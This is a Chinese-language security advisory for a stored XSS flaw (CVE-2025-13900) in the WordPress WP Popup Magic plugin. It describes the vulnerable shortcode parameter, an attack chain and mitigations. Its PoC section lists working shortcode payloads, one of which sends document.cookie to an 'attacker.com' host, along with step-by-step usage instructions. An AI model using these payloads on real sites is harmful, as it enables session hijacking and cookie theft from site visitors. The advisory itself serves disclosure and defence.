CVE-2025-13900 WordPress WP Popup Magic插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13900

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress WP Popup Magic插件

漏洞概述

CVE-2025-13900是WordPress平台下WP Popup Magic插件的一个存储型跨站脚本（Stored XSS）安全漏洞。该插件用于在WordPress网站中创建和管理弹出窗口功能。漏洞源于插件对[wppum_end]短代码的name参数处理不当，未进行充分的输入过滤和输出转义。攻击者只需拥有WordPress网站的Contributor（贡献者）级别权限即可利用此漏洞。通过在[wppum_end]短代码的name参数中注入恶意JavaScript代码，攻击者可以将恶意脚本永久存储在数据库中。当其他用户访问包含该短代码的页面时，注入的恶意脚本会自动执行，可能导致会话劫持、凭据窃取、恶意重定向等攻击。由于存储型XSS的特性，恶意脚本会在每次页面加载时执行，危害范围广泛且持久。此漏洞影响该插件1.0.0及以下所有版本，CVSS评分6.4，属于中危漏洞。

技术细节

漏洞存在于WP Popup Magic插件的class-wppum-frontend.php文件第622行附近。该文件处理[wppum_end]短代码时，直接将用户提供的name参数输出到HTML页面而未进行任何过滤或转义。攻击者可以利用WordPress短代码功能，构造如下恶意payload： [wppum_end name=" onmouseover=alert(document.cookie) x="] 当该短代码被渲染时，未转义的name参数值会被直接嵌入到HTML标签属性中。如果攻击者构造更复杂的payload，如使用双引号闭合现有属性并添加事件处理器，即可执行任意JavaScript代码。由于该值存储在数据库中，所有访问该页面的用户都会受到攻击。攻击者通常利用此漏洞窃取管理员Cookie或冒充管理员执行操作。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站 Contributor 级别或更高权限的账户

STEP 2

步骤2

攻击者创建或编辑文章/页面，在内容中插入包含恶意payload的[wppum_end]短代码

STEP 3

步骤3

WordPress处理短代码时，插件将未过滤的name参数值存入数据库

STEP 4

步骤4

攻击者发布/保存文章，恶意脚本随数据永久存储在数据库中

STEP 5

步骤5

受害者访问包含该短代码的页面，服务器从数据库读取并输出含恶意代码的HTML

STEP 6

步骤6

受害者浏览器解析HTML时执行注入的JavaScript代码，导致Cookie窃取或会话劫持

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-13900 PoC: Stored XSS via [wppum_end] shortcode -->
<!-- 
Author: Generated for CVE-2025-13900
Target: WordPress WP Popup Magic Plugin <= 1.0.0
Attack Vector: Stored XSS via name parameter of [wppum_end] shortcode
Requirements: Contributor-level access or higher
-->

<!-- Basic XSS PoC -->
[wppum_end name='"><script>alert(document.cookie)</script>']

<!-- Event Handler Based XSS PoC -->
[wppum_end name='" onmouseover="alert(String.fromCharCode(88,83,83))" x=']

<!-- Image Tag Based XSS PoC -->
[wppum_end name='"><img src=x onerror=alert(document.domain)>']

<!-- Steal Cookies PoC -->
[wppum_end name='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>']

<!-- Auto-execute PoC using onload -->
[wppum_end name='"><svg/onload=alert(localStorage.getItem("wp_auth"))>']

<!-- 
Usage Instructions:
1. Login to WordPress with Contributor or higher privileges
2. Edit any post/page or create new content
3. Insert one of the above shortcodes in the editor
4. Save/publish the post
5. Visit the page to trigger the XSS payload
6. The JavaScript will execute in the context of the victim's browser
-->

影响范围

WP Popup Magic <= 1.0.0

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 临时禁用WP Popup Magic插件；2) 使用WordPress安全插件（如Wordfence）添加XSS防护规则；3) 限制用户角色权限，仅允许管理员使用短代码功能；4) 启用WAF（Web应用防火墙）过滤恶意请求；5) 审查并删除已发布的包含可疑[wppum_end]短代码的内容。